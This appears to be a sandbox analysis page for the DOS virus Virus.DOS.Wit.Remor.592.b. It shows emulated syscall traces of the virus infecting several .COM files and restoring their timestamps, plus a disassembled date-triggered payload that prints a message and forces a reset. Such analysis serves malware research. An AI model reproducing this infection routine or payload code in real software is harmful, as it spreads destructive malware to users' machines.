Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.592.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:37.573617053Z 26 PC: 12a70 | Set disk transfer address
2018-12-17T22:42:37.5755982Z 71 PC: 12a82 | Get current directory
2018-12-17T22:42:37.579354866Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-17T22:42:37.581800811Z 78 PC: 12ab1 | Find first file
2018-12-17T22:42:37.58868528Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.610531931Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:37.618490371Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.626087278Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.629442429Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.631778874Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-17T22:42:37.643474213Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.645889308Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.656045879Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.657866626Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.667096299Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.678489801Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.681901575Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.692650106Z 61 PC: 12ae1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:42:37.700354171Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.70738246Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.708924373Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.71127915Z 64 PC: 12b5a | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:42:37.71592533Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.717298778Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.727051785Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.728653507Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.738061899Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.749239169Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.752209644Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.762840468Z 61 PC: 12ae1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:42:37.771009108Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.77860273Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.780178476Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.781973694Z 64 PC: 12b5a | Write file or device (Write 92 bytes on handle 5)
2018-12-17T22:42:37.787584996Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.789262978Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.799075221Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.802872603Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.812874797Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.82532685Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.82996666Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.841211285Z 61 PC: 12ae1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:42:37.84914503Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.857446006Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.859238919Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.860958196Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:42:37.866533468Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.869289978Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.878559239Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.880764928Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.889959317Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.900841Z 79 PC: 12ab1 | Find next file
2018-12-17T22:42:37.90389066Z 67 PC: 12acd | Get or set file attributes
2018-12-17T22:42:37.915298774Z 61 PC: 12ae1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:42:37.922909578Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-17T22:42:37.9302674Z 66 PC: 12b1c | Move file pointer
2018-12-17T22:42:37.933995963Z 66 PC: 12b3f | Move file pointer
2018-12-17T22:42:37.936043641Z 64 PC: 12b5a | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:42:37.941245873Z 66 PC: 12b89 | Move file pointer
2018-12-17T22:42:37.944029046Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-17T22:42:37.953786809Z 87 PC: 12bab | Get or set file date and time
2018-12-17T22:42:37.955861187Z 62 PC: 12bb1 | Close file
2018-12-17T22:42:37.965397982Z 67 PC: 12bc3 | Get or set file attributes
2018-12-17T22:42:37.97656933Z 59 PC: 12be6 | Change current directory
2018-12-17T22:42:37.981387576Z 26 PC: 12c03 | Set disk transfer address
2018-12-17T22:42:37.983836469Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.370224173Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.371599218Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.374479821Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.376821937Z 78 PC: 12ab1 | Find first file
2018-12-25T12:02:05.383310818Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:02:05.397786718Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:05.404073895Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-25T12:02:05.410343588Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:02:05.418882227Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:02:05.420229211Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:02:05.428896757Z 66 PC: 12b89 | Move file pointer
2018-12-25T12:02:05.43006853Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-25T12:02:05.437839585Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:02:05.439593447Z 62 PC: 12bb1 | Close file
2018-12-25T12:02:05.448977013Z 67 PC: 12bc3 | Get or set file attributes
2018-12-25T12:02:05.458271866Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.461006983Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.470509714Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.47442384Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.478749677Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.479889197Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.480749595Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.483466499Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.484562654Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.49021191Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.49134898Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.496431504Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.502354053Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.503965739Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.509992391Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.513809358Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.517564872Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.518934305Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.519803105Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.522290208Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.523911211Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.528902686Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.52980881Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.534513892Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.541832278Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.543896268Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.549894766Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.553947139Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.557815892Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.559205966Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.560105359Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.562677473Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.564270283Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.572139315Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.573497053Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.581142432Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.590508386Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.592756127Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.602566122Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.613867833Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.619735454Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.621345234Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.622544328Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.626670601Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.628188646Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.635871897Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.637029541Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.644862637Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.654248156Z 59 PC: 12be6 | Change current directory
2018-12-25T12:02:05.658064916Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:02:05.659311093Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.420677591Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.42256905Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.425365881Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.427377501Z 78 PC: 12ab1 | Find first file
2018-12-25T12:02:05.433188198Z 67 PC: 12acd | Get or set file attributes
2018-12-25T12:02:05.449588287Z 61 PC: 12ae1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:05.455941429Z 63 PC: 12afd | Read file or device (Read 592 bytes on handle 5)
2018-12-25T12:02:05.462366649Z 66 PC: 12b1c | Move file pointer
2018-12-25T12:02:05.464573872Z 66 PC: 12b3f | Move file pointer
2018-12-25T12:02:05.46629071Z 64 PC: 12b5a | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:02:05.474935967Z 66 PC: 12b89 | Move file pointer
2018-12-25T12:02:05.476881899Z 64 PC: 12b9a | Write file or device (Write 592 bytes on handle 5)
2018-12-25T12:02:05.485475239Z 87 PC: 12bab | Get or set file date and time
2018-12-25T12:02:05.486859704Z 62 PC: 12bb1 | Close file
2018-12-25T12:02:05.497787084Z 67 PC: 12bc3 | Get or set file attributes
2018-12-25T12:02:05.507358672Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.510860928Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.521192769Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.527652895Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.534139159Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.542692465Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.543984492Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.546572664Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.547478233Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.553275288Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.554691353Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.56187168Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.571707188Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.573782948Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.583257278Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.590143194Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.596302206Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.597549698Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.599318832Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.603573838Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.60497868Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.613586692Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.615189688Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.622791305Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.63281331Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.635292461Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.644697137Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.662508911Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.668738684Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.670013417Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.671804797Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.676138317Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.677528625Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.686174854Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.6884701Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.696061865Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.705853645Z 79 PC: 12ab1 | Find next file (See above)
2018-12-25T12:02:05.708254642Z 67 PC: 12acd | Get or set file attributes (See above)
2018-12-25T12:02:05.717529672Z 61 PC: 12ae1 | Open file (See above)
2018-12-25T12:02:05.724331346Z 63 PC: 12afd | Read file or device (See above)
2018-12-25T12:02:05.730426465Z 66 PC: 12b1c | Move file pointer (See above)
2018-12-25T12:02:05.731801341Z 66 PC: 12b3f | Move file pointer (See above)
2018-12-25T12:02:05.734023683Z 64 PC: 12b5a | Write file or device (See above)
2018-12-25T12:02:05.73808433Z 66 PC: 12b89 | Move file pointer (See above)
2018-12-25T12:02:05.739416481Z 64 PC: 12b9a | Write file or device (See above)
2018-12-25T12:02:05.748212085Z 87 PC: 12bab | Get or set file date and time (See above)
2018-12-25T12:02:05.749534186Z 62 PC: 12bb1 | Close file (See above)
2018-12-25T12:02:05.7571475Z 67 PC: 12bc3 | Get or set file attributes (See above)
2018-12-25T12:02:05.767006431Z 59 PC: 12be6 | Change current directory
2018-12-25T12:02:05.770870694Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:02:05.77175379Z 59 PC: 12c0e | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7616,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:05.836347083Z 26 PC: 12a70 | Set disk transfer address
2018-12-25T12:02:05.837872539Z 71 PC: 12a82 | Get current directory
2018-12-25T12:02:05.841199936Z 42 PC: 12a88 | Get date 0x12a88: cmp dh, 4
0x12a8b: jne 0x12aa6
0x12a8d: cmp dl, 0xf
0x12a90: jne 0x12aa6
0x12a92: mov ax, 0x1010
0x12a95: out 0x70, ax
0x12a97: mov dx, 0x2eb
0x12a9a: mov ah, 9
0x12a9c: int 0x21
0x12a9e: mov ah, 8
0x12aa0: int 0x21
0x12aa2: mov al, 0xfe
0x12aa4: out 0x64, al
0x12aa6: mov ah, byte ptr [0x315]
0x12aaa: mov cl, 7
0x12aac: mov dx, 0x2df
0x12aaf: int 0x21
0x12ab1: jae 0x12ab6
0x12ab3: jmp 0x12bdd
0x12ab6: mov dx, word ptr [0x30e]
2018-12-25T12:02:05.84333126Z 9 PC: 12a9e | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:02:05.847671626Z 8 PC: 12aa2 | Console input without echo